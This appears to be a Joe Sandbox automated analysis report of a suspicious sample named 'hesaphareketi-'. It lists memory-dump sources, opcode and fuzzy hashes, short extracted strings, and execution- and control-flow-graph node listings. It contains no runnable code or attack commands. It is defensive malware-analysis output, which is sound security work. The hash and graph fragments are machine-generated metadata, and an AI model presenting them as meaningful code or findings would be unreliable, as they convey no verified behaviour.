                                            • Instruction ID: f4756906d7242684ca471288c47020a2ce5d6fe2a62d8fc72cae31006de43d04
                                            • Opcode Fuzzy Hash: ca3c80bd4657b172979a69e8d5062075771ac6d39063a3d3fa28a68c8d246274
                                            • Instruction Fuzzy Hash: B91132B1C043888FCB20DFAAD445B8EFBF4EB48320F14845AE959A7351C339A944CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237413044.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_99d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                            • Instruction ID: c2e2d19f523ab7806c99527eb6919adb0f5cf1629df5eca28263230ecba6c735
                                            • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                            • Instruction Fuzzy Hash: 2F119D75504280DFDB05CF14D5C4B19BBA2FB84324F24C6AED8494B696C33AD84ACBA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237413044.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_99d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                            • Instruction ID: 47094e0e1298b77bb448f2c583114e46cbc10b34349df5c8cbc396d32a99ab88
                                            • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                            • Instruction Fuzzy Hash: 6B118E75504240DFCB05CF14D5C4B15BBA1FB84324F24C6ADD8494B6A6C33AE84ACF61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ffde384803e2ed88c5e168bb405f90b99cc6077387a9acfcd2aa6eacda19e6e1
                                            • Instruction ID: 5cb71164af81c5dc41bf1571ae3e7e4a09b69306bf93566edb53c80cd28fc850
                                            • Opcode Fuzzy Hash: ffde384803e2ed88c5e168bb405f90b99cc6077387a9acfcd2aa6eacda19e6e1
                                            • Instruction Fuzzy Hash: F211A5303147144BE715AB78D4797AA3B95EF41704F01845AE1468F2A3CFB5984A93A6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1cf25f8be5108b9dc166e6e6c9d6acfba4b33e0dd631987326398d359a6bcc6
                                            • Instruction ID: 41c93629e0c67cb49a93a5b8a2c2cc7b8c30af8d85c2e118253617a7dcf4c610
                                            • Opcode Fuzzy Hash: e1cf25f8be5108b9dc166e6e6c9d6acfba4b33e0dd631987326398d359a6bcc6
                                            • Instruction Fuzzy Hash: 9A1104B5C146089FCB20DF9AD444B9EFBF5EB48320F14842AE819A7310D779A945CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3ff2a87e6afbcfb6db327a98fc467ed74f56db25f037cbe0b50d902125c0e4b0
                                            • Instruction ID: b05ecf6161eb311a2195d6f1ed63d17366d4cbaf25fc407fdb6fba363d601b3f
                                            • Opcode Fuzzy Hash: 429b2e30a47d66ed4de9a88c6a68ba95a2c0b18ccf982b6e2c9d9156bc328a4c
                                            • Instruction Fuzzy Hash: A6D062B0D5830DEFD750EFB9891575FBBF56B04244F10896AC015E6245F7B482458F91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f3812ef4830f61981a1e983f72def55bd440f6e935eb0f46739acd11e4583134
                                            • Instruction ID: 6855e95db0a46eab90e13ce5ab45c12eeecb13d6bab2649302e84111768c8c04
                                            • Opcode Fuzzy Hash: f3812ef4830f61981a1e983f72def55bd440f6e935eb0f46739acd11e4583134
                                            • Instruction Fuzzy Hash: 66D0A735640208FFE7407FF4AC01E667729ABCC310F00D041F51819181C532A451EBA0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7736fb25c9f9a349f9550a781d39003eb29636337d9c18b457ddd596fa3e158a
                                            • Instruction ID: ecc18dc1d696c0aa510fca448c3b8e347b87761d313ae88e16ebf642995db6eb
                                            • Opcode Fuzzy Hash: 7736fb25c9f9a349f9550a781d39003eb29636337d9c18b457ddd596fa3e158a
                                            • Instruction Fuzzy Hash: D3C08C312222288B87142678B00D089BFFDEA5D136310447AF409C2300CEB3C80187E0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ef48856c50920dd3ad900e375baf2c0f7f203b75575029cb9c54c242f2586730
                                            • Instruction ID: 3bdc2d2112a8bab4ac7efff2c833fb1da7c691d9a16e0eeea2be92a24f0143c4
                                            • Opcode Fuzzy Hash: ef48856c50920dd3ad900e375baf2c0f7f203b75575029cb9c54c242f2586730
                                            • Instruction Fuzzy Hash: 26C08C3630020CBFDB80AFD4D800D66776DAB08724F50E104FA080E211C272F862EBA0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9e13dd7524075d236f2a8202e58838eb1916d0928cd77514ef101d069b6641d7
                                            • Instruction ID: ad4c06cabbc5bd5b4b6a3091fdbff8d41b8d10c554d59040866b072f927064f4
                                            • Opcode Fuzzy Hash: 9e13dd7524075d236f2a8202e58838eb1916d0928cd77514ef101d069b6641d7
                                            • Instruction Fuzzy Hash: A1A00124A56A8983A81CA2A428DC2294E92AA817497C2ACA6950588000CE658809601A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fd0acc33fce41b490692fb3bd29f5ad23c8b0a5178a23082aeeed6ed3e042b3b
                                            • Instruction ID: 2501c2463d014cf16267364c8b60919460bcba1a17b5e22b3c95d57526439c47
                                            • Opcode Fuzzy Hash: fd0acc33fce41b490692fb3bd29f5ad23c8b0a5178a23082aeeed6ed3e042b3b
                                            • Instruction Fuzzy Hash: 20A02403D005C4C5DF0C7370CC4F30D0D504710144FDC04DC4C00C5303C41CC0000155
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1250486667.000000000A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a8c0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PHq$PHq
                                            • API String ID: 0-1274609152
                                            • Opcode ID: fd2a07cc36780354a9d6ee526bbeef22e4c5410de9bb44c09e67f4b36bb3ac52
                                            • Instruction ID: c76b0fef6565efede95150a74c3bb0fbc87b07eb80a923d9e460eb880644654d
                                            • Opcode Fuzzy Hash: fd2a07cc36780354a9d6ee526bbeef22e4c5410de9bb44c09e67f4b36bb3ac52
                                            • Instruction Fuzzy Hash: 6ED1B234A146048FDB58DF69C598AA9B7F1BF8D301F2681A8E505EB362DB31ED41CF60
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \sq$n:c
                                            • API String ID: 0-125588642
                                            • Opcode ID: bb8d1aa94d0537b82b4b059ea8faa9dffcc764d257dcab740683964e81ac1b52
                                            • Instruction ID: 222bdc001faf5ab6faeaf52def0da0949184c884c4e1c3718f7d7100d9aa967e
                                            • Opcode Fuzzy Hash: bb8d1aa94d0537b82b4b059ea8faa9dffcc764d257dcab740683964e81ac1b52
                                            • Instruction Fuzzy Hash: 6471E778D4020E9FDF14CFA9D884AFEBBB1FF48300F21A655D412EB254DB35A9458B64
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1241727374.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5730000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3afccb371bf166a05b80130bfac632dc947261f63af6960f45ccf2bc1718b1ca
                                            • Instruction ID: 50c9862af7969de9437264b6fe731519c8682fa6048e4af0a5936a5dca67a0ac
                                            • Opcode Fuzzy Hash: 3afccb371bf166a05b80130bfac632dc947261f63af6960f45ccf2bc1718b1ca
                                            • Instruction Fuzzy Hash: 861294F1CD17458AE310CF25F94C2893BA5BB41318FD04A19DA612F2E5EBB4166EEF48
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bfa573c4fe0f6289086dea1afdc0e4e6067887e34d69706307c0d1ee1bfbe0f8
                                            • Instruction ID: 2196d07b1069bf9c38f27f24b152de43dc0b2f414e413dbeab896ffd301df21b
                                            • Opcode Fuzzy Hash: bfa573c4fe0f6289086dea1afdc0e4e6067887e34d69706307c0d1ee1bfbe0f8
                                            • Instruction Fuzzy Hash: D1E106B4E002198FDB14DFA9D580AAEBBF6FF89304F248169E455AB355D730AD42CF60
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ef71cdbe3c438903c29dae8495d7a53d86ddbe9c8ca04ea6110bf0da58093e50
                                            • Instruction ID: 6fe56dbd9078cfd1aaf23ca42faa4c13cc4537d3c10a90b3d7ec64a047cbd8bd
                                            • Opcode Fuzzy Hash: ef71cdbe3c438903c29dae8495d7a53d86ddbe9c8ca04ea6110bf0da58093e50
                                            • Instruction Fuzzy Hash: 5FE1E6B4E002598FDB14DFA9D580AAEFBF2BF89304F248169E455AB355D730AD42CF60
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4961ac58ad453b207158e13109d2efaf4be3e2668923e6adc37b25b1958e209d
                                            • Instruction ID: 60a69ee68fee883575cb658b816dde59b3edd50377b38e5ed44c16abb7d6dc1f
                                            • Opcode Fuzzy Hash: 4961ac58ad453b207158e13109d2efaf4be3e2668923e6adc37b25b1958e209d
                                            • Instruction Fuzzy Hash: ECE1F9B4E002598FDB14DFA9D580AAEFBF2BF89304F248169E455AB355D730AD42CF60
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a0e6bf2e6fdcedae1ea7d1d17a9ef833889b085c192940ab7a61a9bf25c932d7
                                            • Instruction ID: d1123e137dafe6b35dd9c33f16921d7ceb03d3baba635bc6eee1470a6b1899f3
                                            • Opcode Fuzzy Hash: a0e6bf2e6fdcedae1ea7d1d17a9ef833889b085c192940ab7a61a9bf25c932d7
                                            • Instruction Fuzzy Hash: 61E118B4E002598FDB14DFA9D580AAEFBF2BF89300F248169E455AB355D731AD42CF60
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f452974f77b651ddbd1bbc59bc14bba978b206a8b0502d58f9befa58dd2ba5d
                                            • Instruction ID: d963acf74b94959950c727bf88ba33c5a08e1475f50c05bd2087731c2938f066
                                            • Opcode Fuzzy Hash: 2f452974f77b651ddbd1bbc59bc14bba978b206a8b0502d58f9befa58dd2ba5d
                                            • Instruction Fuzzy Hash: 2DE1E8B4E002198FDB14DFA9D580AAEFBF2BF89304F248169E455AB355D731AD42CF60
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80219b861f6e9e435eb15c539bfd1eca81ac39f733b68cecf18e45876b4ee5ca
                                            • Instruction ID: 918c3b223aac52cbf9deaeefe5eeb2e02b919452eae8471b73ddf4770c2adaab
                                            • Opcode Fuzzy Hash: 80219b861f6e9e435eb15c539bfd1eca81ac39f733b68cecf18e45876b4ee5ca
                                            • Instruction Fuzzy Hash: 9AD1F535D2075ACACB11EF64D895A99F771EF95300F20C79AE0493B224EB706AC9CB91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2894fc2df49712babd61888a1ec8529ce3442f2839451d9dfd95d8d70708ecaa
                                            • Instruction ID: aa036b68899b3e84001b84c25329bcbb20eb688ee63f0e60f8ec4e491f10f504
                                            • Opcode Fuzzy Hash: 2894fc2df49712babd61888a1ec8529ce3442f2839451d9dfd95d8d70708ecaa
                                            • Instruction Fuzzy Hash: 18D1F435D2075ACACB11EF64D895A99F771EF95300F20C79AE0493B224EB706AC9CF91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1241727374.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5730000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac5e4b5707721a465ff5711eccdeef715d78408c57ac0f2a83912d2ea009c434
                                            • Instruction ID: 2a2c0d6c879f0b695df5860fe0e9365145735f8d009d247e926f73b84cea9984
                                            • Opcode Fuzzy Hash: ac5e4b5707721a465ff5711eccdeef715d78408c57ac0f2a83912d2ea009c434
                                            • Instruction Fuzzy Hash: 21A17F32E00219CFCF05DFB5D8489AEB7B2FF85310B55456AE806AB266DB31E916DB40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1241727374.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5730000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fcd46c87761f8938535b4f90d34495e4592eb3fa84fab97f2efd93b611475a35
                                            • Instruction ID: 793fcdbff6bce194e0b1934aa56b794110407aafda7a2d38b748af1f06c7f5c3
                                            • Opcode Fuzzy Hash: fcd46c87761f8938535b4f90d34495e4592eb3fa84fab97f2efd93b611475a35
                                            • Instruction Fuzzy Hash: 79C107B1CD07458BE710CF25F84C2893BB5BB85324F904A19D9612F2E1EBB4166EEF48
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 974186d0912bd9802ab699ad3cfb9cd13a9377713c6f6f459c7a3193bca1080b
                                            • Instruction ID: 1e407eb6643ac3d2202b98e0f4bfe50bf969b07fbcc26be464783f82d5138f7e
                                            • Opcode Fuzzy Hash: 974186d0912bd9802ab699ad3cfb9cd13a9377713c6f6f459c7a3193bca1080b
                                            • Instruction Fuzzy Hash: 93514BB4E042198FDB14DFA9D5819EEFBF2BF89200F24816AD418AB355D731AD41CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3fac687b490fe8ce5de947059db82c6bd82017c5d44b23d6827c42c268540cb2
                                            • Instruction ID: 69fce7aa67bf4ba464e16cffee36f57277512d3eec1145988a177ee5c3b756d9
                                            • Opcode Fuzzy Hash: 3fac687b490fe8ce5de947059db82c6bd82017c5d44b23d6827c42c268540cb2
                                            • Instruction Fuzzy Hash: 015108B0E002198FDB14DFA9D5809EEBBF6BF89300F24816AD558AB355D7319942CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 845be520c4658965eeef12d0c5a5ac8fc848b76c375d9a27c800de451a2f27e8
                                            • Instruction ID: e83cb1ddc0780ca30bd76a1546e3a309229f6f647a842f5c1e5173c91b49cd4c
                                            • Opcode Fuzzy Hash: 845be520c4658965eeef12d0c5a5ac8fc848b76c375d9a27c800de451a2f27e8
                                            • Instruction Fuzzy Hash: DF5129B4E042198FDB14DFA9D5809AEFBF2BF89300F24816AD418AB355D7319942CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fc6c4c84f14bc55ee63101417ef9cd0cc517d0c2888e933f8cd7d4661364bba7
                                            • Instruction ID: deb801fc40f70badd6777fac57cf87c09621a6bec294b72d95c9635367aae81b
                                            • Opcode Fuzzy Hash: fc6c4c84f14bc55ee63101417ef9cd0cc517d0c2888e933f8cd7d4661364bba7
                                            • Instruction Fuzzy Hash: 0C412F78E6400E9FDF10CFE9E8819EDB7F1BF88305B15E216E016EB241CA31A8418B50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                                            • API String ID: 0-1794337482
                                            • Opcode ID: bf9cf78f448e5f6b26e4084c4ea932a4ae224cd2a0fa9186949901ef6146bcba
                                            • Instruction ID: 4720b85868feac7aea446458c40c4707b2cdb8581dd027a5edaf835fae283d86
                                            • Opcode Fuzzy Hash: bf9cf78f448e5f6b26e4084c4ea932a4ae224cd2a0fa9186949901ef6146bcba
                                            • Instruction Fuzzy Hash: F6412FB4E912068FCB48EF74F85559E77B2FB84300B80496AD405DF265FB30691EEB85
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                                            • API String ID: 0-1794337482
                                            • Opcode ID: 33d60c43a1fe9f80de225cb3ef3ca289ed6e620cbe9750316fe3c53f2492b476
                                            • Instruction ID: 78aa049e07f5c0831b02d35a8295bed2f89ce9d09f7b78a400c2105a6c6adae3
                                            • Opcode Fuzzy Hash: 33d60c43a1fe9f80de225cb3ef3ca289ed6e620cbe9750316fe3c53f2492b476
                                            • Instruction Fuzzy Hash: 2C410CB4E8120A8FC748EF75F4559AE77B2FB84300BD0896AC4059F265FB30691DEB85

                                            Execution Graph

                                            Execution Coverage:8%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:24
                                            Total number of Limit Nodes:5
                                            execution_graph 50598 cf0848 50600 cf084e 50598->50600 50599 cf091b 50600->50599 50603 cf133f 50600->50603 50609 cf1450 50600->50609 50605 cf12e7 50603->50605 50606 cf1343 50603->50606 50604 cf1448 50604->50600 50605->50600 50606->50604 50608 cf1450 GlobalMemoryStatusEx 50606->50608 50614 cf7059 50606->50614 50608->50606 50610 cf1356 50609->50610 50611 cf1448 50610->50611 50612 cf1450 GlobalMemoryStatusEx 50610->50612 50613 cf7059 GlobalMemoryStatusEx 50610->50613 50611->50600 50612->50610 50613->50610 50615 cf7063 50614->50615 50616 cf7119 50615->50616 50619 5edd2c8 50615->50619 50623 5edd2d8 50615->50623 50616->50606 50620 5edd2d8 50619->50620 50621 5edd502 50620->50621 50622 5edd51a GlobalMemoryStatusEx 50620->50622 50621->50616 50622->50620 50624 5edd2ed 50623->50624 50625 5edd502 50624->50625 50626 5edd51a GlobalMemoryStatusEx 50624->50626 50625->50616 50626->50624
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2242 cf6ea3-cf6f0a call cf6c08 2251 cf6f0c-cf6f25 call cf634c 2242->2251 2252 cf6f26-cf6f55 2242->2252 2256 cf6f57-cf6f5a 2252->2256 2257 cf6f5c-cf6f91 2256->2257 2258 cf6f96-cf6f99 2256->2258 2257->2258 2260 cf6fad-cf6fb0 2258->2260 2261 cf6f9b-cf6fa2 2258->2261 2264 cf6fe3-cf6fe6 2260->2264 2265 cf6fb2-cf6fc6 2260->2265 2262 cf7168-cf716f 2261->2262 2263 cf6fa8 2261->2263 2263->2260 2266 cf6fe8 call cf798b 2264->2266 2267 cf6ff6-cf6ff8 2264->2267 2272 cf6fcc 2265->2272 2273 cf6fc8-cf6fca 2265->2273 2274 cf6fee-cf6ff1 2266->2274 2268 cf6fff-cf7002 2267->2268 2269 cf6ffa 2267->2269 2268->2256 2271 cf7008-cf7017 2268->2271 2269->2268 2277 cf7019-cf701c 2271->2277 2278 cf7041-cf7057 2271->2278 2275 cf6fcf-cf6fde 2272->2275 2273->2275 2274->2267 2275->2264 2281 cf7024-cf703f 2277->2281 2278->2262 2281->2277 2281->2278
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRq$LRq
                                            • API String ID: 0-3710822783

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2901 5ede0d8-5ede0f3 2902 5ede11d-5ede13c call 5edd2a4 2901->2902 2903 5ede0f5-5ede11c call 5edd298 2901->2903 2909 5ede13e-5ede141 2902->2909 2910 5ede142-5ede1a1 2902->2910 2917 5ede1a7-5ede234 GlobalMemoryStatusEx 2910->2917 2918 5ede1a3-5ede1a6 2910->2918 2922 5ede23d-5ede265 2917->2922 2923 5ede236-5ede23c 2917->2923 2923->2922
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3689431073.0000000005ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05ED0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_5ed0000_hesaphareketi-.jbxd

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2926 5ede1c0-5ede1fe 2927 5ede206-5ede234 GlobalMemoryStatusEx 2926->2927 2928 5ede23d-5ede265 2927->2928 2929 5ede236-5ede23c 2927->2929 2929->2928
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE ref: 05EDE227
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3689431073.0000000005ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05ED0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_5ed0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PHq
                                            • API String ID: 0-3820536768
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRq
                                            • API String ID: 0-3187445251
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRq
                                            • API String ID: 0-3187445251
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f1002e21922b5647fed7a3b182dd3ec563bb6f0847d442a22830ef2e1dda77f
                                            • Instruction ID: 9720172eca59440048b725b42ac3f1e8ce3e6a07514a6c9b43d494e32ba712be
